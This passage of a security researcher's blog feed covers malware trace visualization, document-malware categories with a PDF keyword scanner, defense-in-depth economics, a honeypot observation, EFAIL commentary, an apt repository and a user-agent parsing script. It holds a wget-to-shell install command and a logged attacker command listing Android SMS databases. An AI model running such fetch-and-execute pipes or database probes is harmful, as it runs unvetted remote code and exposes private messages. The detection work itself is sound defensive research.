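def train(traces, k=2):
    """Map each length-k history of branch targets to the target that most often follows it."""
    counts = defaultdict(Counter)
    for trace in traces:
        for i in range(k, len(trace)):
            counts[tuple(trace[i - k:i])][trace[i]] += 1
    return {history: c.most_common(1)[0][0] for history, c in counts.items()}


def prediction_hits(model, trace, k=2):
    """1 for each target the model predicted correctly, 0 otherwise (unseen history = miss)."""
    return [int(model.get(tuple(trace[i - k:i])) == trace[i]) for i in range(k, len(trace))]


def windowed_accuracy(hits, window=4):
    """Prediction accuracy over a sliding window; a sudden drop hints at an anomaly."""
    return [sum(hits[i:i + window]) / window for i in range(len(hits) - window + 1)]


# Hypothetical addresses: a benign loop, then a burst of never-seen targets.
loop = [0x401000, 0x401020, 0x401040, 0x401060]
model = train([loop * 5])
suspect = loop * 2 + [0xDEAD00, 0xDEAD10, 0xDEAD20, 0xDEAD30] + loop * 2
accuracy = windowed_accuracy(prediction_hits(model, suspect))
print(accuracy)  # starts at 1.0, falls to 0.0 during the burst, then recovers
```

<p>A lookup table can only memorize histories it has seen, which is why any unseen history counts as a miss; a learned model generalizes better, but the drop-in-accuracy signal works the same way.</p>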
<p>One challenge with such a system is that the traces are massive. Even if we narrow our focus to
only indirect control flow transfers (e.g. <code>ret</code>, <code>icall</code>, and <code>ijmp</code>), that's still thousands to
millions of events per minute of real-time execution. This makes it challenging to diagnose whether there was a bug or
whether the malware simply didn't detonate.</p>
<p>One option is to manually analyze the malware sample, typically by running the virtual machine in another
framework. This is time-consuming, though, which is why I've come up with a niftier solution that involves
visualizing the trace in conjunction with the model's output. This is how I discovered that malware has a
color.</p>
<h2>Visualization Technique</h2>
<p>First, I convert each target address into a color by hashing it. For simplicity, I take the first three
bytes of an <code>md5</code> hash to get an RGB tuple. The reason I use a cryptographic hash function instead of a simple
checksum is so that nearby addresses produce very different colors, creating contrast. Here's an example of
what a benign trace looks like:</p>
<p><center>
<img alt="Benign Trace" src="https://carteryagemann.com/images/vis-ben1.png">
</center></p>
<p>We can clearly see patterns, but there's no clear indicator of what makes one trace normal and another
anomalous. Let's compare with a family of PDF malware that the system is good at detecting: <code>pdfka</code>. Here's one
of the traces:</p>
<p><center>
<img alt="PDFKA Color Trace" src="https://carteryagemann.com/images/vis-pdfka1.png">
</center></p>
<p>Look at that streak of dark blue! What's going on there? Is this an exploit or simply a pattern our previous
example didn't capture? To find out, I create a second image where each target is a white pixel if the
model predicted it correctly and black if the prediction was wrong. Here's the result for the same
trace:</p>
<p><center>
<img alt="PDFKA Model Output" src="https://carteryagemann.com/images/vis-pdfka2.png">
</center></p>
<p>Looks like there's a streak of incorrect predictions that lines up with the dark blue, but let's confirm it
by subtracting the second image from the first. This will cause areas of accurate prediction (white in the second image) to
become black while areas of incorrect prediction will keep their color from the first image. Here's the
result:</p>
<p><center>
<img alt="PDFKA Subtraction" src="https://carteryagemann.com/images/vis-pdfka3.png">
</center></p>
<p>Sure enough, that blue streak is an anomaly produced by <code>pdfka</code>. In fact, if we were to visualize all the <code>pdfka</code>
samples in our paper's evaluation dataset, we would find they all contain a blue streak. What the blue is really
visualizing is an exploit (<code>CVE-2010-0188</code>) being carried out against the TIFF parser library in <code>AcroRd32.dll</code>.
Therefore, we can say the color of <code>pdfka</code> is dark blue!</p>
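<p>The whole visualization fits in a few lines of Python. The sketch below uses only the standard library and is an illustration under assumptions rather than my actual tooling: it hashes each address as 8 little-endian bytes (the exact bytes fed to <code>md5</code> are my assumption), paints correct predictions white and misses black, and subtracts per channel while clamping at zero, so any color minus white becomes black and any color minus black is unchanged. It writes a plain-text PPM image so no imaging library is needed; the addresses and the <code>write_ppm</code> helper are hypothetical.</p>

```python
import hashlib
import os
import tempfile

WHITE, BLACK = (255, 255, 255), (0, 0, 0)


def address_color(addr):
    """First three bytes of the MD5 digest as an RGB tuple.
    Assumption: the address is hashed as 8 little-endian bytes."""
    return tuple(hashlib.md5(addr.to_bytes(8, "little")).digest()[:3])


def prediction_image(hits):
    """White pixel for a correct prediction, black pixel for a miss."""
    return [WHITE if hit else BLACK for hit in hits]


def subtract(image_a, image_b):
    """Per-channel subtraction clamped at 0: color - white = black, color - black = color."""
    return [tuple(max(a - b, 0) for a, b in zip(pa, pb)) for pa, pb in zip(image_a, image_b)]


def write_ppm(path, pixels, width):
    """Write pixels row by row as a plain PPM (P3), padding the last row with black."""
    pixels = pixels + [BLACK] * (-len(pixels) % width)
    height = len(pixels) // width
    with open(path, "w") as f:
        f.write(f"P3\n{width} {height}\n255\n")
        for row in range(height):
            line = pixels[row * width:(row + 1) * width]
            f.write(" ".join(f"{r} {g} {b}" for r, g, b in line) + "\n")


# Hypothetical trace: the third target was mispredicted.
targets = [0x401000, 0x401020, 0x7FFE1234, 0x401000]
hits = [True, True, False, True]
colors = [address_color(a) for a in targets]
anomalies = subtract(colors, prediction_image(hits))
write_ppm(os.path.join(tempfile.gettempdir(), "anomalies.ppm"), anomalies, width=2)
```

<p>Writing <code>colors</code>, <code>prediction_image(hits)</code>, and <code>anomalies</code> separately gives the three kinds of images shown above; in a real trace the width would be chosen to keep the image roughly square.</p>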
<h2>Other Examples</h2>
<p>To demonstrate the value of subtracting, consider this visualization of opening a Microsoft Word document:</p>
<p><center>
<img alt="MS Word Trace" src="https://carteryagemann.com/images/vis-msword1.png">
</center></p>
<p>You may be tempted to conclude this is red malware (since coming up with this technique, I've been referring
to malware by their colors instead of family names for fun), but it's actually benign. We can see this in
the subtraction:</p>
<p><center>
<img alt="MS Word Subtraction" src="https://carteryagemann.com/images/vis-msword2.png">
</center></p>
<p>No color means no anomalies. Now let's see a trace of <code>hancitor</code>:</p>
<p><center>
<img alt="Hancitor" src="https://carteryagemann.com/images/vis-hancitor.png">
</center></p>
<p>As you can see, it's green malware. Meanwhile <code>thus</code> is blue-purple:</p>
<p><center>
<img alt="Thus" src="https://carteryagemann.com/images/vis-thus.png">
</center></p>
<p>I think that's enough examples to make my point. I hope you've been convinced that malware has a color.
Thanks for reading and happy hacking!</p>Upcoming MLsploit Demo at Black Hat Asia 20192019-01-17T17:00:00-05:002019-01-17T17:00:00-05:00Carter Yagemanntag:carteryagemann.com,2019-01-17:/bh-asia-19.html<p>A framework I helped develop called MLsploit will be demoed at Black Hat Asia 2019.
You can read more about it <a href="https://www.blackhat.com/asia-19/arsenal/schedule/index.html#mlsploit-a-cloud-based-framework-for-adversarial-machine-learning-research-14256">here</a>.</p>Three Kinds of Document Malware and Designing Frameworks to Detect Them2018-12-27T12:00:00-05:002018-12-27T12:00:00-05:00Carter Yagemanntag:carteryagemann.com,2018-12-27:/doc-mal-categories.html<p>Lately I've been spending a lot of time with document malware and exploring
techniques for detection. Malicious documents pose interesting challenges and
have become the typical first vector for adversaries to achieve a
foothold. Despite this, document malware seems largely overlooked by academics
compared to executable malware. In short, it's an area worth
exploring.</p>
<p>As I compared the current detection techniques, I noticed the pros and cons
are nuanced. Static analysis is quick and accurate, but very vulnerable to
evasion via adversarial perturbation. Dynamic analysis is slower and error-prone
because samples can fail to trigger, but it produces richer data.
These characteristics are further amplified by the use of machine learning.
Adding junk bytes between the elements of a PDF can evade a static feature
learner <a href="http://www.ra.cs.uni-tuebingen.de/mitarb/srndic/srndic-laskov-sp2014.pdf">in seconds</a>.
Unfortunately, dynamic features don't fare much <a href="https://evademl.org/docs/evademl.pdf">better</a>.</p>
<p>Over time, I've begun to formulate a theory that <em>there are currently three kinds of document malware</em>.
By applying this insight, I find I can substantially influence the results of
my experiments. While not as conclusive as something like a double dissociation,
I want to share what I've observed in hopes that it'll inspire others when designing
their detection systems and provoke feedback.</p>
<p>So without further ado, here's my theory. Currently, there are three kinds of
document malware: <strong>exploit-based, abuse-based, and phishing-based</strong>.
While I propose categories, note that they are not mutually exclusive.
Malware authors can always chain and blend
techniques to achieve their goals. Therefore, these categories should be seen as
points on a spectrum. That said, complexity invites failure, so I do not expect
real world authors to stray far from these focal points.
The following paragraphs elaborate on each category in reverse order.</p>
<h3>Phishing-based</h3>
<p>This is the trickiest category for a computer scientist because humans are
complicated and confusing entities. The exemplar of this category is a document
that tries to convince the user to take some compromising action. There may be
a link to a fake website or steps that lead to disabling a security feature.
Admittedly, this is a category I currently steer clear of.
<em>The best solutions are better education, stronger policies, and a clear strategy for recovery when a human mistake is inevitably made.</em>
Also note that this category
is the most likely to be chained with others. For example, a document may need
to lure the victim into clicking a button before a payload can be used. In rare
cases, user interaction may even be leveraged to thwart automated analysis.
Thankfully, I have yet to see a malware author embed a CAPTCHA in their document.</p>
<h3>Abuse-based</h3>
<p>This category does not consider the human user, but distinguishes itself
in how it uses the target application. The exemplar here
is a PDF containing JavaScript or a Word document with macros that uses provided
APIs to download and execute additional malware. The key point to emphasize here
is these documents do not violate the specification of the application.
<em>The program is functioning as intended.</em> This is why I label these instances
as abuse rather than exploitation. This distinction is critical to consider when
designing a detection framework. On the one hand, they're tricky because they
blend in with benign behavior. This is why, for example, looking at system call
sequences is a bad idea for this category. On the other hand, since the program's
integrity isn't compromised, it's safe to make strong assumptions in these
situations. <em>This is where static analysis is best suited.</em> Designed
correctly, such frameworks can leverage strong models of the target program to
accurately and statically detect abuse. This saves resources and minimizes exposure to
noise.</p>
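<p>To make the static side concrete, here is a deliberately crude sketch in the spirit of keyword scanners such as Didier Stevens' <code>pdfid</code>. It is not the kind of strong program model described above, only an illustration: it counts PDF name objects that commonly indicate active content, decoding <code>#xx</code> escapes so trivially obfuscated names still match. The keyword list is my own illustrative choice, and because the scan only reads raw bytes, names hidden inside compressed streams slip past it, which is exactly the evasion weakness of naive static features.</p>

```python
import re
from collections import Counter

# Illustrative list of name objects that commonly signal active content.
SUSPICIOUS = frozenset({"/JavaScript", "/JS", "/OpenAction", "/AA", "/Launch", "/EmbeddedFile"})

NAME = re.compile(rb"/(?:[A-Za-z0-9]|#[0-9A-Fa-f]{2})+")  # a PDF name, allowing #xx escapes
HEX_ESCAPE = re.compile(rb"#([0-9A-Fa-f]{2})")


def normalize(name):
    """Decode #xx escapes so that /J#61vaScript compares equal to /JavaScript."""
    return HEX_ESCAPE.sub(lambda m: bytes([int(m.group(1), 16)]), name).decode("latin-1")


def scan(pdf_bytes):
    """Count suspicious names in the raw bytes; compressed streams are not inspected."""
    names = (normalize(m.group()) for m in NAME.finditer(pdf_bytes))
    return Counter(n for n in names if n in SUSPICIOUS)


# Hypothetical fragment of a catalog and a JavaScript action.
sample = b"/Type /Catalog /OpenAction 2 0 R /S /J#61vaScript /JS (app.alert(1))"
print(scan(sample))
```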
<h3>Exploit-based</h3>
<p>Which brings us to the last category. Here's where we see the stuff 0-days and CVEs
are made from. It's also where all corners of the security community like to
flaunt their technical know-how with intricate ROP chains and compact shellcode.
Jargon aside,
<em>this category differs from abuse-based in that it does violate the program's specification.</em>
Memory corruption, underflows, overflows, and more are all fair game for achieving
arbitrary code execution. This means the author's attacks can take unusual forms,
like malformed images, and detection frameworks have to cope. For this reason,
<em>this is where dynamic analysis overtakes static.</em> Because exploits by definition
break models and assumptions, the only way towards proactive detection is to actually
trigger them.</p>
<p>I hope readers find this categorization useful. Note that this is not the only way document
malware can be divided. For example, payloads can execute inside the target
application or in a separate process, creating a spectrum of <em>intrinsic</em> versus
<em>extrinsic</em> behaviors. Regardless, my three category theory has helped me design novel
systems and interpret the evaluation results, so I wanted to share it.</p>
<p>Thanks for reading.</p>Mention for Georgia Tech Vulnerability Disclosure2018-09-05T22:15:00-04:002018-09-05T22:15:00-04:00Carter Yagemanntag:carteryagemann.com,2018-09-05:/gatech-vuln-reporters.html<p>Georgia Tech has <a href="https://security.gatech.edu/vulnerability-reporters">acknowledged me</a> for
a past vulnerability I disclosed to them.</p>The Unfortunate Economics of Defense in Depth2018-08-14T23:30:00-04:002018-08-14T23:30:00-04:00Carter Yagemanntag:carteryagemann.com,2018-08-14:/economics-depth-defense.html<p><center>
<img alt="Castles benefit from defense in depth." src="https://carteryagemann.com/images/castle.jpg">
</center></p>
<p>A mantra we hear all the time in security is the notion of <strong>defense in depth</strong>.
It's applied in numerous areas from protecting computer systems to safeguarding airports.
Anyone who receives formal training in security will likely encounter the term at
least once in their coursework. It's a milestone we are told to strive for when
designing secure systems.</p>
<p>For readers who are unfamiliar with the term, it's the idea that when designing security into
a system, we should place several overlapping layers of defense wherever possible.
The insight behind this idea is that thwarting an attack only requires one layer of defense to
succeed whereas the attacker's success depends on penetrating every layer.
Consider, for example, an invading army storming a castle.
In order for the invasion to succeed, the invaders must survive raining arrows from archers,
traverse a moat, breach the castle walls, and kill the soldiers inside. Failure to surmount
any one of these defenses spells disaster for the attack. Worse yet for the invading army, as long
as each layer's chance of successfully halting the attack is independent from the other layers, adding more layers
makes the attacker's task more likely to fail. On the other hand, this is great news if
you are the one assigned to defend the castle.</p>
<p>Unfortunately, step outside the classroom and it will not take long to run into
the counterforce that stifles an otherwise brilliant concept. The force I am referring
to is <strong>economics</strong>. Defenses don't come for free and as I plan to highlight in this
blog post, there is a fundamental problem with applying <strong>defense in depth</strong> once <strong>economics</strong> enters
the equation.</p>
<p>To aid my explanation, let's use fair coin flips as a simple running example.
Although coins are a far cry from airports or castles, the underlying probabilities behind flipping
a coin are simple to understand and also sufficient to make my point.</p>
<p>As you are probably already
aware, a fair coin flip yields one of two mutually exclusive outcomes, heads or tails, with equal
probability. The probability of getting heads once is 50%. Getting heads
twice in a row is 25%. Three times is 12.5%. This probability <em>p</em> is expressed by the following formula for <em>x</em> coin flips:</p>
<p><center>
<img alt="p = 1 / 2^x" src="https://carteryagemann.com/images/coin-flip-prob.jpg">
</center></p>
<p>If we graph this function for a couple of flips, we get the following figure:</p>
<p><center>
<img alt="Graph 1" src="https://carteryagemann.com/images/coin-flip-fig1.jpg">
</center></p>
<p>As we can see, the relationship between the number of flips and the probability is <strong>exponential</strong>.
Adding a few additional flips significantly impacts the probability of getting all heads at first, but
as even more flips are added, eventually the effect diminishes. In other words, the difference in
chance of getting two heads versus three is substantial, but the difference between 999 and
1,000 heads is comparatively minuscule. Tying this analogy back to security, if we map the outcome of heads
to the attacker successfully breaching a layer of security, we can see how overlapping a few defensive layers
can offer significantly better security and reduce the attacker's chance of success. However, with
each additional layer, the defender's gain diminishes. Regardless, this outcome shows that defense
in depth is fundamentally valuable and we can safely apply it in the real world as long as
the layers' effectiveness is completely (or at least nearly) independent of one another.</p>
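<p>The numbers behind this figure are easy to reproduce. The sketch below (function names are my own) multiplies per-layer breach probabilities, which is only valid under the independence assumption just stated, and uses exact fractions so that even the 1,000-flip case doesn't lose precision:</p>

```python
from fractions import Fraction
from math import prod


def attacker_success(breach_probs):
    """Chance of breaching every layer, assuming the layers fail independently."""
    return prod(breach_probs, start=Fraction(1))


def coin_layers(x):
    """x layers that each stop the attacker half the time: p = 1 / 2**x."""
    return attacker_success([Fraction(1, 2)] * x)


def marginal_gain(x):
    """Drop in the attacker's success chance from adding the x-th layer."""
    return coin_layers(x - 1) - coin_layers(x)


print(marginal_gain(3))            # 1/8: two heads vs. three differs by 12.5 points
print(float(marginal_gain(1000)))  # roughly 9.3e-302: 999 vs. 1,000 heads
```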
<p>Unfortunately, as I alluded to in the introduction, every layer of defense has a cost to design, implement,
deploy, and maintain. If these costs are also completely (or at least nearly) independent, a problem arises.
Namely, each additional layer raises the cost of the overall defense <strong>linearly</strong>, but the return yielded
in security diminishes <strong>exponentially</strong>. Returning to our running example, now consider the case where each flip
costs one unit of resource to perform. If we add this function to our previous graph, we get the
following figure:</p>
<p><center>
<img alt="Graph 2" src="https://carteryagemann.com/images/coin-flip-fig2.jpg">
</center></p>
<p>And if we reformat this graph to show the gain in cost relative to the gain in security, we get:</p>
<p><center>
<img alt="Graph 3" src="https://carteryagemann.com/images/coin-flip-fig3.jpg">
</center></p>
<p>Put plainly, the cost of using defense in depth to achieve <strong>decent</strong> security is relatively <strong>cheap</strong>, but
achieving <strong>exceptional</strong> security is extremely <strong>expensive</strong>. This is bad news for the defender and a
fundamental limitation to the idea of defense in depth.</p>
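<p>The same trade-off can be written down directly. Assuming, as in the figures, that every layer costs one unit and stops the attacker half the time, the <em>x</em>-th layer buys a risk reduction of 1/2<sup>x</sup>, so each unit of security it adds costs 2<sup>x</sup> units. The hypothetical helper <code>layers_needed</code> counts how many layers a given risk target requires:</p>

```python
from fractions import Fraction


def risk(x, breach_prob=Fraction(1, 2)):
    """Attacker's success chance against x independent layers."""
    return breach_prob ** x


def cost_per_unit_gain(x, cost_per_layer=1):
    """Cost of the x-th layer divided by the risk reduction it buys."""
    return cost_per_layer / (risk(x - 1) - risk(x))


def layers_needed(max_risk, breach_prob=Fraction(1, 2)):
    """Fewest layers that push the attacker's success chance to max_risk or below."""
    x = 0
    while risk(x, breach_prob) > max_risk:
        x += 1
    return x


for x in (1, 2, 3, 10, 20):
    print(x, cost_per_unit_gain(x))  # cost per unit: 2, 4, 8, 1024, 1048576
print(layers_needed(Fraction(1, 100)), layers_needed(Fraction(1, 10**6)))  # 7 20
```

<p>Going from a 1% to a one-in-a-million chance of a breach takes 13 more layers, and the last of them buys less than a millionth of risk reduction for the same unit cost as the first.</p>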
<p>Hopefully you now understand the title of this blog post and realize why this relationship is important
to grasp. For example, understanding this topic helps explain the controversies and debates surrounding
the cost of funding the Transportation Security Administration's twenty "Layers of Security" framework:</p>
<p><center>
<img alt="The TSA's Layers of Security." src="https://carteryagemann.com/images/tsa-layers.jpg">
</center></p>
<p>I'll forgo an in-depth analysis of this chart since other researchers have already examined it in
<a href="http://a.co/bSrRjVP">great detail</a>, but to summarize, if you pick a relevant threat to airport
security and consider each layer's effect on stopping it, you'll realize removing any one layer has
seemingly little impact on the overall risk of failure. This raises the question of whether there are layers that
can be removed to significantly reduce cost without significantly reducing security. Certainly an
idea worth exploring, if the science can be separated from the politics. Until then, I hope you've found this
blog post interesting and insightful.</p>Paper Accepted to ACM CCS 20182018-07-23T22:00:00-04:002018-07-23T22:00:00-04:00Carter Yagemanntag:carteryagemann.com,2018-07-23:/ccs18-publication.html<p>A paper I co-authored has been accepted to the <em>25th ACM Conference on Computer and
Communications Security</em> (CCS'18) being held in Toronto, Canada from October
15, 2018 to October 19, 2018.</p>
<p><strong>Title:</strong> Enforcing Unique Code Target Property for Control-Flow Integrity</p>
<p><strong>Authors:</strong> Hong Hu, Chenxiong Qian, <em>Carter Yagemann</em>, Simon Pak Ho Chung,
Bill Harris, Taesoo Kim, Wenke Lee</p>
<p><strong>Abstract:</strong></p>
<p>The goal of control-flow integrity (CFI) is to stop control-hijacking attacks by ensuring that each indirect control-flow transfer (ICT) jumps to its legitimate target. However, existing implementations of CFI have fallen short of this goal because their approaches are inaccurate and as a result, the set of allowable targets for an ICT instruction is too large, making illegal jumps possible.</p>
<p>In this paper, we propose the Unique Code Target (UCT) property for CFI. Namely, for each invocation of an ICT instruction, there should be one and only one valid target. We develop a prototype called uCFI to enforce this new property. During compilation, uCFI identifies the sensitive instructions that influence ICT and instruments the program to record necessary execution context. At runtime, uCFI monitors the program execution in a different process, and performs points-to analysis by interpreting sensitive instructions using the recorded execution context in a memory safe manner. It checks runtime ICT targets against the analysis results to detect CFI violations. We apply uCFI to SPEC benchmarks and 2 servers (nginx and vsftpd) to evaluate its efficacy of enforcing UCT and its overhead. We also test uCFI against control-hijacking attacks, including 5 real-world exploits, 1 proof of concept COOP attack, and 2 synthesized attacks that bypass existing defenses. The results show that uCFI strictly enforces the UCT property for protected programs, successfully detects all attacks, and introduces less than 10% performance overhead.</p>Weird Things Are Afoot In The Honeypot2018-05-30T11:00:00-04:002018-05-30T11:00:00-04:00Carter Yagemanntag:carteryagemann.com,2018-05-30:/android-ssh.html<p>Here's something you don't see every day. The logs from my SSH honeypot show
someone brute-forcing the password for root and then executing:</p>
<div class="highlight"><pre><span></span><code>ls /data/data/com.android.providers.telephony/databases
</code></pre></div>
<p>This is a strange directory to look for because it's where Android devices
store the SQLite databases for SMS messages and contacts. Why would an attacker
expect an SSH server on the internet to be an Android device? Are there IoT
devices based on Android that run SSH servers and also store contacts? If
someone knows, please tell me!</p>EFF and EFAIL: An Example of Hype Culture Gone Awry2018-05-14T21:30:00-04:002018-05-14T21:30:00-04:00Carter Yagemanntag:carteryagemann.com,2018-05-14:/eff-efail.html<p>I usually try to keep my blog posts technical and free of politics, but
I can't hide my frustration over EFF's response to today's release of the
<a href="https://efail.de/">EFAIL</a> vulnerability.</p>
<p>If you haven't heard by now, EFAIL is the
name of a vulnerability having to do with how email clients like Thunderbird handle PGP
encrypted emails. This vulnerability allows a strong adversary to decrypt
emails, provided that they already possess previously encrypted messages from a victim, can
tamper with emails in transit, and the victim's client is configured to
automatically fetch remote content.</p>
<p>I emphasize the word <em>strong</em> because
any security researcher can see that these preconditions mean this attack
is only a concern to individuals being targeted by nation-states.
As many Slashdot users and companies like ProtonMail
<a href="https://protonmail.com/blog/pgp-vulnerability-efail/">have pointed out</a>,
this vulnerability is over-hyped, blown out of proportion,
and the course of action being loudly proposed is somewhere between
draconian and moronic.</p>
<p>Unfortunately, it seems EFF is at the forefront of this
<a href="https://www.eff.org/deeplinks/2018/05/attention-pgp-users-new-vulnerabilities-require-you-take-action-now">crusade</a>
to misguide users. Within hours of the details being released,
EFF published a blog post advising everyone to immediately stop using PGP.
Since then, less than 24 hours later, EFF has published over <strong>13</strong> articles
driving home the "crisis" and providing step-by-step tutorials on how to
"take action" by
<a href="https://www.eff.org/deeplinks/2018/05/disabling-pgp-thunderbird-enigmail">disabling PGP</a>
and
<a href="https://www.eff.org/deeplinks/2018/05/using-command-line-decrypt-message-linux">decrypting emails</a>.
It is impressive that EFF has managed to write so much about EFAIL
in so little time.</p>
<p>As a security researcher, allow me to share a piece of wisdom echoed by many
of my peers. <em>The appropriate reaction to a vulnerability that can potentially
decrypt emails </em><em>is not</em><em> to start sending messages in plaintext</em>.
Sane people don't erase their operating system because of a bug, disable their
firewall because of a glitch, or stop using encryption because of a flawed
implementation. Decide how big of a risk EFAIL is to you, come up with a plan
for remediation based on that risk, and apply software patches when they become
available. For most users, this boils down to simply continuing your good security habits.
Disabling security in response to a bug is insanity.</p>
<p><strong>Shame on EFF for over-hyping vulnerabilities and giving terrible security advice!</strong></p>Debian Apt Repo for libipt2018-02-24T18:30:00-05:002018-02-24T18:30:00-05:00Carter Yagemanntag:carteryagemann.com,2018-02-24:/libipt-repo.html<p>As part of my Ph.D. research, I play around with Intel Processor Trace a lot.
As a result, I frequently use <a href="https://github.com/01org/processor-trace">libipt</a>,
both as a library for my own software and for the reference programs it includes.
<code>ptdump</code> and <code>ptxed</code> are my go-to utilities for quickly checking and
manipulating traces. They're super useful!</p>
<p>Sadly on Debian and Ubuntu, the default package repositories only have a package
for the main library (no pre-compiled program binaries) that is woefully out
of date (last update was in 2016). Having to repeatedly compile
<a href="https://github.com/intelxed/xed">xed</a> and
<a href="https://github.com/01org/processor-trace">libipt</a>
from source quickly got annoying, so I've decided to publish my own repository. I've
also made it public in hopes that others will find it useful.</p>
<p>The repository tracks the master branch on <a href="https://github.com/01org/processor-trace">libipt</a>
and <a href="https://github.com/intelxed/xed">xed</a>, so its packages should always contain
the latest code. I've made adding it to apt super easy:</p>
<div class="highlight"><pre><span></span><code>sh<span class="w"> </span>-c<span class="w"> </span><span class="s2">"</span><span class="k">$(</span>wget<span class="w"> </span>-qO<span class="w"> </span>-<span class="w"> </span>https://super.gtisc.gatech.edu/libipt.sh<span class="k">)</span><span class="s2">"</span>
</code></pre></div>
<p>It currently has the following libraries:</p>
<ul>
<li>libxed</li>
<li>libxed-dev</li>
<li>libipt (includes the sideband library)</li>
</ul>
<p>And the following pre-compiled programs:</p>
<ul>
<li>ptdump</li>
<li>pttc</li>
<li>ptxed</li>
</ul>
<p>More information about these libraries and programs is available in their respective
documentation. I hope to add more packages in the coming days.</p>
<p>For people interested in learning how to host their own repositories, I built this
server using <a href="https://www.gocd.org/">gocd</a>, <a href="https://www.aptly.info/">aptly</a>, and
<a href="https://httpd.apache.org/">apache</a>.</p>H&R Block "MyBlock" App + USA Government Website Analytics = PROFIT2018-02-09T16:00:00-05:002018-02-09T16:00:00-05:00Carter Yagemanntag:carteryagemann.com,2018-02-09:/hrb-analytics.html<p>I like data mining. For better or worse, it's the gold of the digital age. So
when the USA government decided to make the analytical data for their publicly
facing websites available for <a href="https://analytics.usa.gov/data/">download</a>, I
jumped at the opportunity. Thanks to this lovely data source, I can get
insights into how popular various browsers and operating systems are, how
frequently devices connect to USA government websites from foreign IP
addresses, and more.</p>
<p>Sadly, the website only offers metrics for the past 30 days. Luckily, it's
pretty easy to set up a Raspberry Pi or other small device to periodically fetch
the freshest numbers and build a larger dataset. This is what I've been doing
since August of 2016. <strong>If you're interested, send me an email and I'll be happy
to share</strong>. After all, according to the government's website: <em>"this website and
its data are free for you to use without restriction."</em></p>
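<p>For anyone who wants to build a similar archive, here is a minimal sketch of the fetch step, assuming a cron job (for example <code>0 6 * * * python3 snapshot.py URL</code>) runs it once a day. It is not the exact script running on my device, and the file and function names are hypothetical; point it at whichever report file you want from the download page. Each run saves a copy under a UTC timestamp so that older 30-day windows are never overwritten.</p>

```python
import datetime
import pathlib
import sys
import urllib.parse
import urllib.request


def snapshot(url, out_dir):
    """Download one report and save it as TIMESTAMP-FILENAME inside out_dir."""
    out_dir = pathlib.Path(out_dir)
    out_dir.mkdir(parents=True, exist_ok=True)
    stamp = datetime.datetime.now(datetime.timezone.utc).strftime("%Y%m%dT%H%M%SZ")
    name = pathlib.PurePosixPath(urllib.parse.urlparse(url).path).name or "report"
    dest = out_dir / f"{stamp}-{name}"
    with urllib.request.urlopen(url, timeout=60) as response:
        dest.write_bytes(response.read())
    return dest


if __name__ == "__main__" and len(sys.argv) > 1:
    # Usage: python3 snapshot.py REPORT_URL [OUT_DIR]
    print(snapshot(sys.argv[1], sys.argv[2] if len(sys.argv) > 2 else "snapshots"))
```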
<p>Continuing my story, I was skimming over the most recent metrics when I noticed
a funny browser user-agent:</p>
<div class="highlight"><pre><span></span><code>HRB-MOBILE-IOS-PHONE-MYBLOCK-TOUCHID-6.1.0-Mozilla
</code></pre></div>
<p>With a quick search, I figured out that
<a href="https://itunes.apple.com/us/app/my-block/id490111274">MyBlock</a> is a mobile app
offered by H&R Block. More interesting though is the juicy information H&R
Block decided to embed in these user-agent strings. As we can see, they contain
the name of the app, the version number, the OS (iOS or Android), the
device form factor (phone or tablet), and in the case of iOS, it even mentions
whether TouchID or FaceID was used. As a security researcher, I'm particularly
interested in this last tidbit because people use H&R Block to file taxes and
these user-agents started appearing January 7, 2018 (i.e., tax season). So how
many people use the various authentication methods offered by Apple to protect
their tax filing app? Let's find out!</p>
<p>The following is a small Python script I wrote to filter the data. The parsing
and filtering leave much to be desired, but I didn't want to spend too much time
on such a simple task:</p>
<div class="highlight"><pre><span></span><code><span class="ch">#!/usr/bin/env python3</span>
<span class="kn">import</span> <span class="nn">sys</span>
<span class="kn">import</span> <span class="nn">json</span>


<span class="k">def</span> <span class="nf">parse_subtokens</span><span class="p">(</span><span class="n">tokens</span><span class="p">):</span>
<span class="w">    </span><span class="sd">""" Parses subtokens and returns a dictionary. If invalid, None is returned.</span>
<span class="sd">    We expect Android user agents to be in the form of:</span>
<span class="sd">    HRB MOBILE ANDROID [PHONE|TABLET] MYBLOCK [VERSION] <BROWSER></span>
<span class="sd">    and iOS user agents to be in the form of:</span>
<span class="sd">    HRB MOBILE IOS [PHONE|TABLET] MYBLOCK <TOUCHID|FACEID> [VERSION] [BROWSER]</span>
<span class="sd">    Fields in square brackets are required; fields in angle brackets are optional.</span>
<span class="sd">    """</span>
    <span class="c1"># Need at least the five fixed fields plus a version</span>
    <span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">tokens</span><span class="p">)</span> <span class="o"><</span> <span class="mi">6</span><span class="p">:</span>
        <span class="k">return</span> <span class="kc">None</span>
    <span class="n">res</span> <span class="o">=</span> <span class="p">{}</span>
    <span class="k">if</span> <span class="n">tokens</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">!=</span> <span class="s1">'HRB'</span><span class="p">:</span>
        <span class="k">return</span> <span class="kc">None</span>
    <span class="k">if</span> <span class="n">tokens</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span> <span class="o">!=</span> <span class="s1">'MOBILE'</span><span class="p">:</span>
        <span class="k">return</span> <span class="kc">None</span>
    <span class="k">if</span> <span class="n">tokens</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span> <span class="o">!=</span> <span class="s1">'ANDROID'</span> <span class="ow">and</span> <span class="n">tokens</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span> <span class="o">!=</span> <span class="s1">'IOS'</span><span class="p">:</span>
        <span class="k">return</span> <span class="kc">None</span>
    <span class="n">res</span><span class="p">[</span><span class="s1">'OS'</span><span class="p">]</span> <span class="o">=</span> <span class="n">tokens</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span>
    <span class="k">if</span> <span class="n">tokens</span><span class="p">[</span><span class="mi">3</span><span class="p">]</span> <span class="o">!=</span> <span class="s1">'PHONE'</span> <span class="ow">and</span> <span class="n">tokens</span><span class="p">[</span><span class="mi">3</span><span class="p">]</span> <span class="o">!=</span> <span class="s1">'TABLET'</span><span class="p">:</span>
        <span class="k">return</span> <span class="kc">None</span>
    <span class="n">res</span><span class="p">[</span><span class="s1">'DEVICE'</span><span class="p">]</span> <span class="o">=</span> <span class="n">tokens</span><span class="p">[</span><span class="mi">3</span><span class="p">]</span>
    <span class="k">if</span> <span class="n">tokens</span><span class="p">[</span><span class="mi">4</span><span class="p">]</span> <span class="o">!=</span> <span class="s1">'MYBLOCK'</span><span class="p">:</span>
        <span class="k">return</span> <span class="kc">None</span>
